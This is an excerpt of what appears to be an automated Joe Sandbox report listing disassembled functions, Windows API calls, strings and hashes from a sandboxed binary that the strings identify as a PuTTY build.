                    • Instruction Fuzzy Hash: E9C08C3C101A544ACE298A1882B53A43394A391783F9025CCCE130B742CB5E9DCAF602
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00C00300 Relevance: 124.6, APIs: 42, Strings: 29, Instructions: 400libraryloaderregistryCOMMON
                    Download Yara Rule
                    APIs
                    • GetProcAddress.KERNEL32(00000000,AddDllDirectory), ref: 00C0034B
                    • RegOpenKeyA.ADVAPI32(80000002,SOFTWARE\MIT\Kerberos,?), ref: 00C0037D
                    • RegQueryValueExA.ADVAPI32(?,InstallDir,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00C003A6
                    • RegQueryValueExA.ADVAPI32(?,InstallDir,00000000,?,00000000,?), ref: 00C003E3
                    • _strlen.LIBCMT ref: 00C003FF
                    • _strlen.LIBCMT ref: 00C0043C
                    • LoadLibraryExA.KERNEL32(00000000,00000000,00000D00), ref: 00C0046A
                    • RegCloseKey.ADVAPI32(?), ref: 00C004D6
                    • GetProcAddress.KERNEL32(00000000,gss_delete_sec_context), ref: 00C00518
                    • GetProcAddress.KERNEL32(00000000,gss_display_status), ref: 00C00524
                    • GetProcAddress.KERNEL32(00000000,gss_get_mic), ref: 00C00530
                    • GetProcAddress.KERNEL32(00000000,gss_verify_mic), ref: 00C0053C
                    • GetProcAddress.KERNEL32(00000000,gss_import_name), ref: 00C00548
                    • GetProcAddress.KERNEL32(00000000,gss_init_sec_context), ref: 00C00554
                    • GetProcAddress.KERNEL32(00000000,gss_release_buffer), ref: 00C00560
                    • GetProcAddress.KERNEL32(00000000,gss_release_cred), ref: 00C0056C
                    • GetProcAddress.KERNEL32(00000000,gss_release_name), ref: 00C00578
                    • GetProcAddress.KERNEL32(00000000,gss_acquire_cred), ref: 00C00584
                    • GetProcAddress.KERNEL32(00000000,gss_inquire_cred_by_mech), ref: 00C00590
                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00BD73A0,?), ref: 00C005AB
                    • FreeLibrary.KERNEL32(00000000), ref: 00C0049E
                      • Part of subcall function 00BEB850: LoadLibraryA.KERNELBASE(00000000,00000000,?,00BF99F0,kernel32.dll), ref: 00BEB86F
                    • GetProcAddress.KERNEL32(00000000,AcquireCredentialsHandleA), ref: 00C005FA
                    • GetProcAddress.KERNEL32(00000000,InitializeSecurityContextA), ref: 00C00607
                    • GetProcAddress.KERNEL32(00000000,FreeContextBuffer), ref: 00C00614
                    • GetProcAddress.KERNEL32(00000000,FreeCredentialsHandle), ref: 00C00621
                    • GetProcAddress.KERNEL32(00000000,DeleteSecurityContext), ref: 00C0062E
                    • GetProcAddress.KERNEL32(00000000,QueryContextAttributesA), ref: 00C0063B
                    • GetProcAddress.KERNEL32(00000000,MakeSignature), ref: 00C00648
                    • GetProcAddress.KERNEL32(00000000,VerifySignature), ref: 00C00655
                    • _strlen.LIBCMT ref: 00C006DC
                    • LoadLibraryExA.KERNEL32(?,00000000,00000D00,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00C00757
                    • GetProcAddress.KERNEL32(00000000,gss_delete_sec_context), ref: 00C007A5
                    • GetProcAddress.KERNEL32(00000000,gss_display_status), ref: 00C007B1
                    • GetProcAddress.KERNEL32(00000000,gss_get_mic), ref: 00C007BD
                    • GetProcAddress.KERNEL32(00000000,gss_verify_mic), ref: 00C007C9
                    • GetProcAddress.KERNEL32(00000000,gss_import_name), ref: 00C007D5
                    • GetProcAddress.KERNEL32(00000000,gss_init_sec_context), ref: 00C007E1
                    • GetProcAddress.KERNEL32(00000000,gss_release_buffer), ref: 00C007ED
                    • GetProcAddress.KERNEL32(00000000,gss_release_cred), ref: 00C007F9
                    • GetProcAddress.KERNEL32(00000000,gss_release_name), ref: 00C00805
                    • GetProcAddress.KERNEL32(00000000,gss_acquire_cred), ref: 00C00811
                    • GetProcAddress.KERNEL32(00000000,gss_inquire_cred_by_mech), ref: 00C0081D
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: AddressProc$Library$Load_strlen$CloseQueryValue$FreeOpen
                    • String ID: %.*s$2.dl$AcquireCredentialsHandleA$AddDllDirectory$DeleteSecurityContext$FreeContextBuffer$FreeCredentialsHandle$InitializeSecurityContextA$InstallDir$MakeSignature$QueryContextAttributesA$SOFTWARE\MIT\Kerberos$Using GSSAPI from user-specified library '%s'$VerifySignature$api3$gss_acquire_cred$gss_delete_sec_context$gss_display_status$gss_get_mic$gss_import_name$gss_init_sec_context$gss_inquire_cred_by_mech$gss_release_buffer$gss_release_cred$gss_release_name$gss_verify_mic$kernel32.dll$l$secur32.dll
                    • API String ID: 3724305165-2373097305
                    • Opcode ID: d3496047c15a717a5ef181f0240137705cdc1ad815dc9bf0844e0bfb89c6470e
                    • Instruction ID: 7136da92f136c3fa36c49ef0c92301336e636fd8597ff4929c7e0921a30567ad
                    • Opcode Fuzzy Hash: d3496047c15a717a5ef181f0240137705cdc1ad815dc9bf0844e0bfb89c6470e
                    • Instruction Fuzzy Hash: 5AD1E8B0940344AFDB109F659C86B3B7BE8EF41B08F11452DFC499B296EB74DA04CB56
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BCE540 Relevance: 75.7, APIs: 40, Strings: 3, Instructions: 415windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetWindowLongA.USER32 ref: 00BCE641
                    • SetBkMode.GDI32(?,00000001), ref: 00BCE65D
                    • GetStockObject.GDI32(0000000D), ref: 00BCE665
                    • SelectObject.GDI32(?,00000000), ref: 00BCE66D
                    • GetObjectA.GDI32(00000000,0000003C,?), ref: 00BCE67B
                    • CreateFontIndirectA.GDI32(?), ref: 00BCE6A2
                    • SelectObject.GDI32(?,00000000), ref: 00BCE6AE
                    • GetSysColorBrush.USER32(0000000F), ref: 00BCE6B6
                    • SetDlgItemTextA.USER32 ref: 00BCE777
                    • SetWindowTextA.USER32(?), ref: 00BCE795
                    • GetDlgItem.USER32 ref: 00BCE7A8
                    • DestroyWindow.USER32(00000000), ref: 00BCE7B3
                    • SendDlgItemMessageA.USER32(?,00000064,000000BA,00000000,00000000), ref: 00BCE7C5
                    • MapDialogRect.USER32(?,00000028), ref: 00BCE808
                    • GetDlgItem.USER32 ref: 00BCE82E
                    • GetDlgItem.USER32 ref: 00BCE857
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: Item$Object$Window$SelectText$BrushColorCreateDestroyDialogFontIndirectLongMessageModeRectSendStock
                    • String ID: %s$<$PuTTYHostKeyMoreInfo
                    • API String ID: 2631976558-3476551089
                    • Opcode ID: 252be1153724d5f235c8be4d85b2a0d1db50036cb72ab4056ae35b2434a3d68f
                    • Instruction ID: 24dc1a4bf9af1c4a842ec33580718b9cf1f3b7d5ea5ec47e4d5bbca775b287d1
                    • Opcode Fuzzy Hash: 252be1153724d5f235c8be4d85b2a0d1db50036cb72ab4056ae35b2434a3d68f
                    • Instruction Fuzzy Hash: 8BE17771548301AFE7219F10DC49F2EBBE5FB89708F14081DF696A72A0C7B5E909CB92
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00C3ECF0 Relevance: 40.4, APIs: 14, Strings: 9, Instructions: 138filepipeCOMMON
                    Download Yara Rule
                    APIs
                    • ___from_strstr_to_strchr.LIBCMT ref: 00C3ED34
                    • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000003,40000000,00000000,?,?,?,?,?,00C3EEB8,?), ref: 00C3ED75
                    • GetLastError.KERNEL32(?,?,?,?,?,00C3EEB8,?), ref: 00C3ED7C
                    • WaitNamedPipeA.KERNEL32 ref: 00C3ED8A
                    • GetLastError.KERNEL32(?,?,?,?,?,00C3EEB8,?), ref: 00C3ED94
                      • Part of subcall function 00BEC330: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,751F5B70,00BEC777), ref: 00BEC367
                      • Part of subcall function 00BEC330: OpenProcess.KERNEL32(02000000,00000000,00000000,?,?,?,?,?,?,?,?,751F5B70,00BEC777), ref: 00BEC375
                      • Part of subcall function 00BEC330: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,751F5B70,00BEC777), ref: 00BEC3B4
                      • Part of subcall function 00BEC330: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,751F5B70,00BEC777), ref: 00BEC3D1
                      • Part of subcall function 00BEC330: GetLengthSid.ADVAPI32(00000000,?,?,?,?,?,?,?,?,751F5B70,00BEC777), ref: 00BEC3FB
                      • Part of subcall function 00BEC330: CopySid.ADVAPI32(00000000,00000000,00000000), ref: 00BEC41A
                      • Part of subcall function 00BEC330: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,751F5B70,00BEC777), ref: 00BEC43B
                      • Part of subcall function 00BEC330: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,751F5B70,00BEC777), ref: 00BEC44A
                      • Part of subcall function 00BEC330: LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,751F5B70,00BEC777), ref: 00BEC455
                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00C3EEB8,?), ref: 00C3EDD7
                    • GetLastError.KERNEL32(?,?,?,?,?,?,00C3EEB8,?), ref: 00C3EDDD
                      • Part of subcall function 00BECC90: FormatMessageA.KERNEL32(00001200,00000000,?,00000400,?,0000FFFF,00000000,?,?,?,?,00BE69BE,?), ref: 00BECD1B
                      • Part of subcall function 00BECC90: _strlen.LIBCMT ref: 00BECD26
                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00C3EEB8,?), ref: 00C3EE15
                    • GetLastError.KERNEL32(?,?,?,?,?,00C3EEB8,?), ref: 00C3EE1B
                    • EqualSid.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00C3EEB8,?), ref: 00C3EE37
                    • LocalFree.KERNEL32(?,?,?,?,?,?,?,00C3EEB8,?), ref: 00C3EE44
                    Strings
                    • /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/windows/named-pipe-client.c, xrefs: 00C3ED1C, 00C3ED42
                    • Error waiting for named pipe '%s': %s, xrefs: 00C3EDA5
                    • strncmp(pipename, "\\\\.\\pipe\\", 9) == 0, xrefs: 00C3ED21
                    • Unable to get user SID: %s, xrefs: 00C3EE2B
                    • Unable to get named pipe security information: %s, xrefs: 00C3EDED
                    • strchr(pipename + 9, '\\') == NULL, xrefs: 00C3ED47
                    • Unable to open named pipe '%s': %s, xrefs: 00C3EE05
                    • \\.\pipe\, xrefs: 00C3ED08
                    • Owner of named pipe '%s' is not us, xrefs: 00C3EE5D
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: ErrorLast$CloseHandle$Local$FreeProcess$AllocCopyCreateCurrentEqualFileFormatLengthMessageNamedOpenPipeWait___from_strstr_to_strchr_strlen
                    • String ID: /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/windows/named-pipe-client.c$Error waiting for named pipe '%s': %s$Owner of named pipe '%s' is not us$Unable to get named pipe security information: %s$Unable to get user SID: %s$Unable to open named pipe '%s': %s$\\.\pipe\$strchr(pipename + 9, '\\') == NULL$strncmp(pipename, "\\\\.\\pipe\\", 9) == 0
                    • API String ID: 1975913820-4078258191
                    • Opcode ID: 821e4ffc44171caf8de8fdbd0d05191372ae1f9afadb2ad616ec79b8fc168b4f
                    • Instruction ID: 6a861479cf3243653a949172bbd2795105fd831dd80efe9b7496ba282017c84c
                    • Opcode Fuzzy Hash: 821e4ffc44171caf8de8fdbd0d05191372ae1f9afadb2ad616ec79b8fc168b4f
                    • Instruction Fuzzy Hash: CA419871A50305BBE7107B71AC0BF6F3AA8EF45759F140124F91BE61D1EA61990487A2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00C3A0D0 Relevance: 38.8, APIs: 2, Strings: 20, Instructions: 265COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: _strftime
                    • String ID: %Y-%m-%d %H:%M:%S UTC$cert_ca_key$cert_ca_key_$cert_ca_key_algorithm_id$cert_ca_sig$cert_critical_option$cert_critical_option_data$cert_extension$cert_extension_data$cert_key_id$cert_nonce$cert_serial$cert_type$cert_valid_after$cert_valid_after_date$cert_valid_before$cert_valid_before_date$cert_valid_principal$host$user
                    • API String ID: 1867682108-3603795471
                    • Opcode ID: 1bb099d95d386d3cbb5aefa5622ea60e8eef29257f794000545f4e832719186f
                    • Instruction ID: 9bff3149c5bd8ba41933f8ea4dd0155e35653b0355359f0a817ff2de4ea1b26a
                    • Opcode Fuzzy Hash: 1bb099d95d386d3cbb5aefa5622ea60e8eef29257f794000545f4e832719186f
                    • Instruction Fuzzy Hash: F981A8B6900200BFDB11AF54DC86D6EB7E5FF44304F084868F99897253E772E964DB92
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BD47C0 Relevance: 37.6, APIs: 25, Instructions: 149COMMON
                    Download Yara Rule
                    APIs
                    • DeleteObject.GDI32 ref: 00BD47F8
                    • CreateCompatibleDC.GDI32(00000000), ref: 00BD481E
                    • SelectObject.GDI32(00000000), ref: 00BD482D
                    • _strlen.LIBCMT ref: 00BD4834
                    • GetTextExtentPoint32A.GDI32(00000000,?,00000000,?), ref: 00BD4844
                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000016), ref: 00BD4863
                    • InvalidateRect.USER32(?,00000000,00000000), ref: 00BD486E
                    • DeleteDC.GDI32(00000000), ref: 00BD4875
                    • DefWindowProcA.USER32(?,?,?,?), ref: 00BD4882
                    • BeginPaint.USER32(?,?), ref: 00BD4895
                    • SelectObject.GDI32(00000000), ref: 00BD48AA
                    • GetStockObject.GDI32(00000007), ref: 00BD48AE
                    • SelectObject.GDI32(00000000,00000000), ref: 00BD48B6
                    • CreateSolidBrush.GDI32 ref: 00BD48BE
                    • SelectObject.GDI32(00000000,00000000), ref: 00BD48CA
                    • GetClientRect.USER32(?,?), ref: 00BD48D5
                    • Rectangle.GDI32(00000000,?,?,?,?), ref: 00BD48EC
                    • GetWindowTextLengthA.USER32(?), ref: 00BD48F3
                    • GetWindowTextA.USER32 ref: 00BD4914
                    • SetTextColor.GDI32(00000000), ref: 00BD4921
                    • SetBkColor.GDI32(00000000), ref: 00BD492E
                    • TextOutA.GDI32(00000000,?,?,00000000,00000000), ref: 00BD4947
                    • SelectObject.GDI32(00000000), ref: 00BD495A
                    • DeleteObject.GDI32(?), ref: 00BD4964
                    • EndPaint.USER32(?,?), ref: 00BD4970
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: Object$SelectText$Window$Delete$ColorCreatePaintRect$BeginBrushClientCompatibleExtentInvalidateLengthPoint32ProcRectangleSolidStock_strlen
                    • String ID:
                    • API String ID: 2408264671-0
                    • Opcode ID: ab847e40165181101ab26e7ab0bb8c3fa8fd19ca5048efb6207fbe6df8c416ab
                    • Instruction ID: 8533a0a4cbe6ce03e0f10158dc16d1ea5b1d4c1dc091ba1dde2e76e67fe2c95b
                    • Opcode Fuzzy Hash: ab847e40165181101ab26e7ab0bb8c3fa8fd19ca5048efb6207fbe6df8c416ab
                    • Instruction Fuzzy Hash: 1E515E72504200AFD3119F60EC49F6F7BA9EB8E759F000519F64793260DB35A905DB66
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BB84A0 Relevance: 36.9, APIs: 17, Strings: 4, Instructions: 181windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetDC.USER32 ref: 00BB8583
                    • GetDeviceCaps.GDI32(00000000,00000026), ref: 00BB858E
                    • CreatePalette.GDI32 ref: 00BB85A5
                    • SelectPalette.GDI32(00000000,00000000,00000000), ref: 00BB85C2
                    • RealizePalette.GDI32(00000000), ref: 00BB85C5
                    • GetStockObject.GDI32(0000000F), ref: 00BB85CD
                    • SelectPalette.GDI32(00000000,00000000,00000000), ref: 00BB85D7
                    • SetPaletteEntries.GDI32(?,?,?,?), ref: 00BB8635
                    • GetDC.USER32(00000000), ref: 00BB8647
                    • SelectPalette.GDI32(00000000,00000000), ref: 00BB865C
                    • UnrealizeObject.GDI32 ref: 00BB866A
                    • RealizePalette.GDI32(00000000), ref: 00BB8671
                    • GetStockObject.GDI32(0000000F), ref: 00BB8699
                    • SelectPalette.GDI32(00000000,00000000,00000000), ref: 00BB86A3
                    • ReleaseDC.USER32 ref: 00BB86B0
                    • InvalidateRect.USER32(00000000,00000001), ref: 00BB86D2
                    • ReleaseDC.USER32 ref: 00BB86E6
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: Palette$Select$Object$RealizeReleaseStock$CapsCreateDeviceEntriesInvalidateRectUnrealize
                    • String ID: /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/windows/window.c$ncolours <= OSC4_NCOLOURS - start$start <= OSC4_NCOLOURS$wgs.term_hwnd
                    • API String ID: 3328073877-4099717352
                    • Opcode ID: b6c8b7ea1cd1889a496be109e6cbf4c698c39a610071eb7890ba4878ae1ed4f1
                    • Instruction ID: 91b6c9c6b7f83d78b1c3827bc6050d98da7f107f42da4502a9054d92635b077a
                    • Opcode Fuzzy Hash: b6c8b7ea1cd1889a496be109e6cbf4c698c39a610071eb7890ba4878ae1ed4f1
                    • Instruction Fuzzy Hash: 71514670604311AFE7216F64EC49FAE3BADEB1630AF1801A4FA47972A1DFB19840D764
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BEEEA0 Relevance: 31.6, APIs: 8, Strings: 10, Instructions: 59libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00BEB850: LoadLibraryA.KERNELBASE(00000000,00000000,?,00BF99F0,kernel32.dll), ref: 00BEB86F
                    • GetProcAddress.KERNEL32(00000000,EnumPrintersA), ref: 00BEEEDB
                    • GetProcAddress.KERNEL32(00000000,OpenPrinterA), ref: 00BEEEE8
                    • GetProcAddress.KERNEL32(00000000,ClosePrinter), ref: 00BEEEF5
                    • GetProcAddress.KERNEL32(00000000,StartDocPrinterA), ref: 00BEEF02
                    • GetProcAddress.KERNEL32(00000000,EndDocPrinter), ref: 00BEEF0F
                    • GetProcAddress.KERNEL32(00000000,StartPagePrinter), ref: 00BEEF1C
                    • GetProcAddress.KERNEL32(00000000,EndPagePrinter), ref: 00BEEF29
                    • GetProcAddress.KERNEL32(00000000,WritePrinter), ref: 00BEEF36
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: AddressProc$LibraryLoad
                    • String ID: ClosePrinter$EndDocPrinter$EndPagePrinter$EnumPrintersA$OpenPrinterA$StartDocPrinterA$StartPagePrinter$WritePrinter$spoolss.dll$winspool.drv
                    • API String ID: 2238633743-2130675966
                    • Opcode ID: 053f9f34dcf246aedcef3c82ec5be729e1035bf99eb6ab76be07fb4663fe668a
                    • Instruction ID: 3c081436eaacd0d3aa5899b8b36842ed43e0dde3e54835ea379d800457e35135
                    • Opcode Fuzzy Hash: 053f9f34dcf246aedcef3c82ec5be729e1035bf99eb6ab76be07fb4663fe668a
                    • Instruction Fuzzy Hash: 78111FB0A457D56EE701AF25AC0AB7FB7D4AB51714F0A0229F41096270EFB44B078B95
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BBACF4 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 336COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00BB5E50: _strlen.LIBCMT ref: 00BB5E61
                    • __fread_nolock.LIBCMT ref: 00BBAF51
                      • Part of subcall function 00BB5D40: DeleteObject.GDI32(00000000), ref: 00BB5D81
                      • Part of subcall function 00BB5D40: DestroyIcon.USER32(FFFFFFFF,00000000,?,?,00BBB151,00000001,?,?,?,?,?,00BB5BA6,?,00BB2A83), ref: 00BB5D90
                      • Part of subcall function 00BB5D40: DeleteObject.GDI32(?), ref: 00BB5DB8
                      • Part of subcall function 00BB5D40: CoUninitialize.OLE32(00000001,?,?,?,?,?,00BB5BA6,?,00BB2A83), ref: 00BB5DCD
                    Strings
                    • -cleanup, xrefs: 00BBAE04
                    • --host_ca, xrefs: 00BBAE7B
                    • -demo-terminal, xrefs: 00BBAEA3
                    • demo-server.example.com, xrefs: 00BBAFDC, 00BBB0C2
                    • %s expects input and output filenames, xrefs: 00BBAF92
                    • -demo-config-box, xrefs: 00BBAE91
                    • This procedure will remove ALL Registry entriesassociated with %s, and will also removethe random seed file. (This only affects thecurrently logged-in user.)THIS PROCESS WILL DESTROY YOUR SAVED SESSIONS.Are you really sure you want to continue?, xrefs: 00BBB04A
                    • unknown option "%s", xrefs: 00BBAEBF
                    • %s expects an output filename, xrefs: 00BBAF87
                    • unexpected argument "%s", xrefs: 00BBAF7C
                    • can't open input file '%s', xrefs: 00BBAF1F
                    • -pgpfp, xrefs: 00BBAE1A
                    • --host-ca, xrefs: 00BBAE4F
                    • option "%s" requires an argument, xrefs: 00BBADB1
                    • %s Warning, xrefs: 00BBB05A
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: DeleteObject$DestroyIconUninitialize__fread_nolock_strlen
                    • String ID: %s Warning$%s expects an output filename$%s expects input and output filenames$--host-ca$--host_ca$-cleanup$-demo-config-box$-demo-terminal$-pgpfp$This procedure will remove ALL Registry entriesassociated with %s, and will also removethe random seed file. (This only affects thecurrently logged-in user.)THIS PROCESS WILL DESTROY YOUR SAVED SESSIONS.Are you really sure you want to continue?$can't open input file '%s'$demo-server.example.com$option "%s" requires an argument$unexpected argument "%s"$unknown option "%s"
                    • API String ID: 3701376555-528882638
                    • Opcode ID: 7b4c5ad2aa62801f736f8a382b4726be4059224f5cf8d4ab2e88222050afaff3
                    • Instruction ID: 8dfd5a35a35838f5bee8c063b8621caf26283365e844eb4089592a9ba6ea3783
                    • Opcode Fuzzy Hash: 7b4c5ad2aa62801f736f8a382b4726be4059224f5cf8d4ab2e88222050afaff3
                    • Instruction Fuzzy Hash: 8991F4A5E4424037EA2136206C87FFF36D88F6174AF5804F8FC0965283FBE5E95991A7
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BB6420 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 167windowCOMMON
                    Download Yara Rule
                    APIs
                    • CreatePopupMenu.USER32 ref: 00BB644C
                    • AppendMenuA.USER32 ref: 00BB6481
                    • DeleteMenu.USER32(?,00000000), ref: 00BB65A5
                    • DeleteMenu.USER32(00000200,00000000), ref: 00BB65B4
                    • InsertMenuA.USER32(00000010,00000010,00000000,S&pecial Command), ref: 00BB65D2
                    • InsertMenuA.USER32(00000010,00000800,00000200,00000000), ref: 00BB65E8
                    • DeleteMenu.USER32(?,00000000), ref: 00BB6604
                    • DeleteMenu.USER32(00000200,00000000), ref: 00BB6613
                    • InsertMenuA.USER32(00000010,00000010,00000000,S&pecial Command), ref: 00BB6631
                    • InsertMenuA.USER32(00000010,00000800,00000200,00000000), ref: 00BB6647
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: Menu$DeleteInsert$AppendCreatePopup
